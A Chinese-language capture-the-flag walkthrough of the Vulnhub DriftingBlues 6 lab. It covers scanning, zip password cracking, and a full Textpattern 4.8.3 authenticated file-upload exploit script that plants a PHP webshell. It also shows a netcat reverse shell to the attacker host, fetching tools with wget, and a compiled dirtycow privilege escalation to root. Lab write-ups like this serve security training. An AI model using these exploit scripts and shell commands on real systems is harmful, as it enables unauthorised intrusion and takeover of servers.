Vulnhub之Driftingblues 6靶机详细解题过程(包含修改从网上修改利用代码的过程)
作者:jason_huawen
靶机基本信息
名称:DriftingBlues: 6
地址:https://www.vulnhub.com/entry/driftingblues-6,672/
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.126.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:dd:4f:27 1 60 PCS Systemtechnik GmbH
192.168.56.195 08:00:27:c2:6e:bd 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.195
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.195 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 03:01 EST
Nmap scan report for localhost (192.168.56.195)
Host is up (0.00016s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/textpattern/textpattern
|_http-title: driftingblues
|_http-server-header: Apache/2.2.22 (Debian)
MAC Address: 08:00:27:C2:6E:BD (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.23 seconds
NMAP扫描结果表明目标主机有1个开放端口80,运行HTTP服务。
Get Access
──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ curl http://192.168.56.195/
<!DOCTYPE html>
<html>
<title>driftingblues</title>
<body class="gbody">
<style>
.gbody {
background-color: #f4ecd8;
width: 1000px;
margin: 40px auto;
font-family: arial;
font-size: 20px;
}
.gempty1 {
display: inline-block;
width: 1000px;
height: 10px;
border-bottom: solid 1px #000000;
}
.gempty {
display: inline-block;
width: 1000px;
height: 70px;
}
</style>
<span class="main1">
<h1>Drifting Blues Tech
<h2>please don't hack
<h2>enough is enough!!!
<br><br><img src="db.png">
</span>
<span class="gempty"></span>
</body>
</html>
<!--
please hack vvmlist.github.io instead
he and their army always hacking us -->
返回页面源代码中有注释,去看了网站vmlist.github.io,提供攻防虚拟机下载,不知道这里有什么用?(备注:其实最后才发现,这个信息没有任何意义,不知道是不是打广告)
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ curl http://192.168.56.195/robots.txt
User-agent: *
Disallow: /textpattern/textpattern
dont forget to add .zip extension to your dir-brute
;)
访问robots.txt文件,返回页面内容给出2个提示:
-
存在目录:/textpattern/textmpattern
-
在做目录扫描时需要加上.zip扩展名(备注:做完整个过程,似乎这点提示没啥用途)
浏览器访问(http://192.168.56.195/textpattern/textpattern/),返回一个登录页面,先不着急破解这个登录,看一下有无其他目录。
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ nikto -h http://192.168.56.195
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.195
+ Target Hostname: 192.168.56.195
+ Target Port: 80
+ Start Time: 2022-11-20 03:08:32 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Server may leak inodes via ETags, header found with file /, inode: 14067, size: 750, mtime: Mon Mar 15 09:36:18 2021
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.38-1~dotdeb+7.1
+ Cookie txp_test_cookie created without the httponly flag
+ Entry '/textpattern/textpattern/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8726 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2022-11-20 03:08:44 (GMT-5) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ gobuster dir -u http://192.168.56.195 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.195
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/20 03:09:27 Starting gobuster in directory enumeration mode
===============================================================
/index (Status: 200) [Size: 750]
/db (Status: 200) [Size: 53656]
/robots (Status: 200) [Size: 110]
/spammer (Status: 200) [Size: 179]
/server-status (Status: 403) [Size: 295]
Progress: 217403 / 220561 (98.57%)===============================================================
2022/11/20 03:10:02 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
gobuster扫描出目录,其中/spammer为一个压缩文档,下载到Kali Linux本地,将其解压,发现有口令保护,用john工具破解:
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ cat spammer
reds.txt-A�J^��
i�E��Lq8+._��;�lPK?˭oRa� creds.txt
▒�L�}����bi����bi��PK[B
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ ls
db.jpeg nmap_full_scan spammer
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ ls
db.jpeg nmap_full_scan spammer
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ file spammer
spammer: Zip archive data, at least v2.0 to extract, compression method=store
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ unzip spammer
Archive: spammer
[spammer] creds.txt password:
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ zip2john spammer > hashes
ver 2.0 spammer/creds.txt PKZIP Encr: cmplen=27, decmplen=15, crc=B003611D ts=ADCB cs=b003 type=0
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
myspace4 (spammer/creds.txt)
1g 0:00:00:00 DONE (2022-11-20 03:11) 33.33g/s 682666p/s 682666c/s 682666C/s christal..michelle4
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ ls
db.jpeg hashes nmap_full_scan spammer
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ unzip spammer
Archive: spammer
[spammer] creds.txt password:
extracting: creds.txt
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ ls
creds.txt db.jpeg hashes nmap_full_scan spammer
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ cat creds.txt
mayer:lionheart
难道这是/textpattern/textpattern/登录页面的用户名和密码,试一下,
哈哈,可以成功登录!
通过浏览页面内容,识别出目标站点的CMS为TextPattern CMS(版本4.8.3),查一下有没有相关漏洞
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ searchsploit textpattern
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
TextPattern 1.19 - 'publish.php' Remote File Inclusion | php/webapps/2646.txt
TextPattern 4.2 - 'index.php' Cross-Site Scripting | php/webapps/35571.txt
TextPattern 4.4.1 - 'ddb' Cross-Site Scripting | php/webapps/36489.txt
TextPattern 4.6.2 - 'qty' SQL Injection | php/webapps/44277.txt
Textpattern 4.8.3 - Remote code execution (Authenticated) (2) | php/webapps/49620.py
textpattern CMS 4.2.0 - Remote File Inclusion | php/webapps/14823.txt
Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting | php/webapps/48861.txt
Textpattern CMS 4.6.2 - Cross-site Request Forgery | php/webapps/48907.txt
TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated) | php/webapps/48943.py
Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS) | php/webapps/49616.txt
TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated) | php/webapps/49996.txt
TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated) | php/webapps/50415.txt
TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS) | php/webapps/49975.txt
Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS) | php/webapps/49617.txt
TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated) | php/webapps/50095.py
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
查询漏洞结果告知我们该版本有远程执行漏洞,需要提供用户名和密码,不过前面咱们已经得到了这些信息,因此接下来应该就是如何利用这个漏洞从而拿到目标主机的shell。
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ searchsploit -m php/webapps/48943.py
Exploit: TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated)
URL: https://www.exploit-db.com/exploits/48943
Path: /usr/share/exploitdb/exploits/php/webapps/48943.py
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/Vulnhub/Driftingblue6/48943.py
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ ls
48943.py creds.txt db.jpeg hashes nmap_full_scan spammer
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ mv 48943.py exploit.py
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ cat exploit.py
#!/usr/bin/python3
# Exploit Title: TextPattern <= 4.8.3 - Authenticated Remote Code Execution via Unrestricted File Upload
# Google Dork: N/A
# Date: 16/10/2020
# Exploit Author: Michele '0blio_' Cisternino
# Vendor Homepage: https://textpattern.com/
# Software Link: https://github.com/textpattern/textpattern
# Version: <= 4.8.3
# Tested on: Kali Linux x64
# CVE: N/A
(省略)
执行该代码,却发现报错:
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ python exploit.py http://192.168.56.195 mayer lionheart
Software: TextPattern <= 4.8.3
CVE: CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload
Author: Michele '0blio_' Cisternino
[*] Authenticating to the target as 'mayer'
Traceback (most recent call last):
File "/home/kali/Vulnhub/Driftingblue6/exploit.py", line 83, in <module>
log.success ("Logged in as '{}' (Cookie: txp_login={}; txp_login_public={})".format(username, s.cookies['txp_login'], s.cookies['txp_login_public']))
File "/usr/lib/python3/dist-packages/requests/cookies.py", line 328, in __getitem__
return self._find_no_duplicates(name)
File "/usr/lib/python3/dist-packages/requests/cookies.py", line 399, in _find_no_duplicates
raise KeyError('name=%r, domain=%r, path=%r' % (name, domain, path))
KeyError: "name='txp_login', domain=None, path=None"
仔细查看代码,发现url参数需要加上textpattern,重新执行该代码
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ python exploit.py http://192.168.56.195/textpattern/ mayer lionheart
Software: TextPattern <= 4.8.3
CVE: CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload
Author: Michele '0blio_' Cisternino
[*] Authenticating to the target as 'mayer'
[✓] Logged in as 'mayer' (Cookie: txp_login=mayer%2C10e487590f7a8c0386b71f85b846c013; txp_login_public=3988843a95mayer)
[*] Grabbing _txp_token (required to proceed with exploitation)..
Traceback (most recent call last):
File "/home/kali/Vulnhub/Driftingblue6/exploit.py", line 89, in <module>
scriptJS = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-2]
AttributeError: 'NoneType' object has no attribute 'replace'
从输出结果看,这次执行代码可以成功验证,但是却报错NoneType没有replace属性,这表明soup提取信息有问题,折腾了好久哈,最后还是这种方式解决:人工方式先确认好信息,即通过浏览器提交,然后查看返回页面,发现目标script应当下标应当是3,因此修改exploit代码,成功执行:
修改后的代码如下:
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ cat exploit.py
#!/usr/bin/python3
# Exploit Title: TextPattern <= 4.8.3 - Authenticated Remote Code Execution via Unrestricted File Upload
# Google Dork: N/A
# Date: 16/10/2020
# Exploit Author: Michele '0blio_' Cisternino
# Vendor Homepage: https://textpattern.com/
# Software Link: https://github.com/textpattern/textpattern
# Version: <= 4.8.3
# Tested on: Kali Linux x64
# CVE: N/A
import sys
import json
import requests
from bs4 import BeautifulSoup as bs4
from time import sleep
import random
import string
import readline
# Disable SSL warnings
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
# Simple Terminal User Interface class I wrote to print run-time logs and headers
class Tui ():
def __init__ (self):
self.red = '\033[91m'
self.green = '\033[92m'
self.blue = '\033[94m'
self.yellow = '\033[93m'
self.pink = '\033[95m'
self.end = '\033[0m'
self.bold = '\033[1m'
def header (self, software, author, cve='N/A'):
print ("\n", "{}Software:{} {}".format(self.pink, self.end, software), sep='')
print ("{}CVE:{} {}".format(self.pink, self.end, cve))
print ("{}Author:{} {}\n".format(self.pink, self.end, author))
def info (self, message):
print ("[{}*{}] {}".format(self.blue, self.end, message))
def greatInfo (self, message):
print ("[{}*{}] {}{}{}".format(self.blue, self.end, self.bold, message, self.end))
def success (self, message):
print ("[{}✓{}] {}{}{}".format(self.green, self.end, self.bold, message, self.end))
def warning (self, message):
print ("[{}!{}] {}".format(self.yellow, self.end, message))
def error (self, message):
print ("[{}✗{}] {}".format(self.red, self.end, message))
log = Tui()
log.header (software="TextPattern <= 4.8.3", cve="CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload", author="Michele '0blio_' Cisternino")
if len(sys.argv) < 4:
log.info ("USAGE: python3 exploit.py http://target.com username password")
log.info ("EXAMPLE: python3 exploit.py http://localhost admin admin\n")
sys.exit()
# Get input from the command line
target, username, password = sys.argv[1:4]
# Fixing URL
target = target.strip()
if not target.startswith("https://") and not target.startswith("http://"):
target = "http://" + target
if not target.endswith("/"):
target = target + "/"
accessData = {'p_userid':username, 'p_password':password, '_txp_token':""}
# Login
log.info ("Authenticating to the target as '{}'".format(username))
s = requests.Session()
try:
r = s.post(target + "textpattern/index.php", data=accessData, verify=False)
#print(r.text)
sleep(1)
if r.status_code == 200:
log.success ("Logged in as '{}' (Cookie: txp_login={}; txp_login_public={})".format(username, s.cookies['txp_login'], s.cookies['txp_login_public']))
sleep(1)
# Parsing the response to find the upload token inside the main json array
log.info ("Grabbing _txp_token (required to proceed with exploitation)..")
soup = bs4(r.text, 'html.parser')
scriptJS = soup.find_all("script")[3].string.replace("var textpattern = ", "")[:-2]
scriptJS = json.loads(scriptJS)
uploadToken = scriptJS['_txp_token']
log.greatInfo ("Upload token grabbed successfully ({})".format(uploadToken))
# The server reply with a 401 with the user provide wrong creds as input
elif r.status_code == 401:
log.error ("Unable to login. You provided wrong credentials..\n")
sys.exit()
except requests.exceptions.ConnectionError:
log.error ("Unable to connect to the target!")
sys.exit()
# Crafting the upload request here
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Accept" : "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01",
"Accept-Encoding" : "gzip, deflate",
"X-Requested-With" : "XMLHttpRequest",
"Connection" : "close",
}
# Generating random webshell name
randomFilename = ''.join(random.choice(string.ascii_letters) for i in range(10)) + '.php'
# Mapping multiparts here
multipart_form_data = {
"fileInputOrder" : (None, '1/1'),
"app_mode" : (None, 'async'),
"MAX_FILE_SIZE" : (None, '2000000'),
"event" : (None, 'file'),
"step" : (None, 'file_insert'),
"id" : (None, ' '),
"_txp_token" : (None, uploadToken), # Token here
"thefile[]" : (randomFilename, '<?php system($_GET["efcd"]); ?>') # lol
}
# Uploading the webshell
log.warning ("Sending payload..")
try:
r = s.post (target + "textpattern/index.php?event=file", verify=False, headers=headers, files=multipart_form_data)
if "Files uploaded" in r.text:
log.success ("Webshell uploaded successfully as {}".format(randomFilename))
except:
log.error ("Unexpected error..")
sys.exit()
sleep(2)
# Interact with the webshell (using the readline library to save the history of the executed commands at run-time)
log.greatInfo ("Interacting with the HTTP webshell..")
sleep (1)
print()
while 1:
try:
cmd = input ("\033[4m\033[91mwebshell\033[0m > ")
if cmd == 'exit':
raise KeyboardInterrupt
r = requests.get (target + "files/" + randomFilename + "?efcd=" + cmd, verify=False)
print (r.text)
except KeyboardInterrupt:
log.warning ("Stopped.")
exit()
except:
log.error ("Unexpected error..")
sys.exit()
print()
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ python exploit.py http://192.168.56.195/textpattern/ mayer lionheart
Software: TextPattern <= 4.8.3
CVE: CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload
Author: Michele '0blio_' Cisternino
[*] Authenticating to the target as 'mayer'
[✓] Logged in as 'mayer' (Cookie: txp_login=mayer%2C91154435c008b5d82f3d6cb4a3bd62cb; txp_login_public=dfda872e11mayer)
[*] Grabbing _txp_token (required to proceed with exploitation)..
[*] Upload token grabbed successfully (c81aff80d74f9c7e053c5b57df723dde)
[!] Sending payload..
[✓] Webshell uploaded successfully as JYLqdITdSw.php
[*] Interacting with the HTTP webshell..
webshell >
这样我们就得到了目标主机webshell,但是这种shell看起来不舒服,可以另外spawn一个shell,而且目标主机也有nc,所以比较简单就可以拿到新的反弹回来的shell
webshell > which nc
/bin/nc
webshell > nc -e /bin/bash 192.168.56.137 5555
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.195] 59581
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@driftingblues:/var/www/textpattern/files$
提权
将linpeas.sh脚本上传至目标主机/tmp目录下,修改权限,并执行脚本:
www-data@driftingblues:/home$ cd /tmp
cd /tmp
www-data@driftingblues:/tmp$ wget http://192.168.56.137:8000/linpeas.sh
wget http://192.168.56.137:8000/linpeas.sh
--2022-11-20 03:04:50-- http://192.168.56.137:8000/linpeas.sh
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827827 (808K) [text/x-sh]
Saving to: `linpeas.sh'
100%[======================================>] 827,827 --.-K/s in 0.003s
2022-11-20 03:04:50 (226 MB/s) - `linpeas.sh' saved [827827/827827]
www-data@driftingblues:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@driftingblues:/tmp$ ./linpeas.sh
./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
╚═══════════════════╝
OS: Linux version 3.2.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.78-1
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: driftingblues
Writable folder: /run/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 3.2.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.78-1
lsb_release Not Found
╔══════════╣ Sudo version
sudo Not Found
╔══════════╣ CVEs Check
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/bin:/usr/bin:/bin
New path exported: /usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/sbin:/sbin
╔══════════╣ Date & uptime
Sun Nov 20 03:04:59 CST 2022
03:04:59 up 1:06, 0 users, load average: 0.08, 0.03, 0.05
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
sda5
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
UUID=5a40899b-5a6a-4039-93bd-f75bc21a8d58 / ext4 errors=remount-ro 0 1
UUID=c9a5ff49-f528-4594-8e61-b8100cb73bd7 none swap sw 0 0
/dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0
╔══════════╣ Environment
╚ Any private information inside environment variables?
HISTFILESIZE=0
SHLVL=2
OLDPWD=/home
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2.pid
_=./linpeas.sh
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/sbin:/sbin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
HISTSIZE=0
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/tmp
HISTFILE=/dev/null
╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: [ debian=7|8 ],RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: [ debian=7|8 ],RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
Linpeas.sh执行结果我们可以利用dirtycow 2进行本地提权,linpeas.sh输出结果中就有利用代码的地址,将C代码下载到Kali Linux本地,然后上传到目标主机的/tmp目录下,按照代码中所描述的步骤进行编译,然后执行,从而拿到了root权限
www-data@driftingblues:/var/www$ cd /tmp
cd /tmp
www-data@driftingblues:/tmp$ wget http://192.168.56.137:8000/40839.c
wget http://192.168.56.137:8000/40839.c
--2022-11-20 03:18:05-- http://192.168.56.137:8000/40839.c
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5006 (4.9K) [text/x-csrc]
Saving to: `40839.c'
100%[======================================>] 5,006 --.-K/s in 0s
2022-11-20 03:18:05 (1.09 GB/s) - `40839.c' saved [5006/5006]
www-data@driftingblues:/tmp$ ls
ls
40839.c linpeas.sh
www-data@driftingblues:/tmp$ gcc -pthread 40839.c -o dirty -lcrypt
gcc -pthread 40839.c -o dirty -lcrypt
www-data@driftingblues:/tmp$ ls
ls
40839.c dirty linpeas.sh
www-data@driftingblues:/tmp$ chmod +x dirty
chmod +x dirty
www-data@driftingblues:/tmp$ ./dirty
./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 12345
Complete line:
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash
mmap: 7fb172436000
id
id
su - firefart
su - firefart
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '12345'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '12345'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
www-data@driftingblues:/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@driftingblues:/tmp$ su - firefart
Password: 12345
firefart@driftingblues:~# id
id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@driftingblues:~# cd /root
cd /root
firefart@driftingblues:~# ls -alh
ls -alh
total 20K
drwx------ 3 firefart root 4.0K Mar 17 2021 .
drwxr-xr-x 23 firefart root 4.0K Mar 17 2021 ..
drwx------ 2 firefart root 4.0K Mar 17 2021 .aptitude
-rw------- 1 firefart root 165 Mar 17 2021 .bash_history
-r-x------ 1 firefart root 1.8K Mar 17 2021 flag.txt
firefart@driftingblues:~# cat flag.txt
cat flag.txt
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
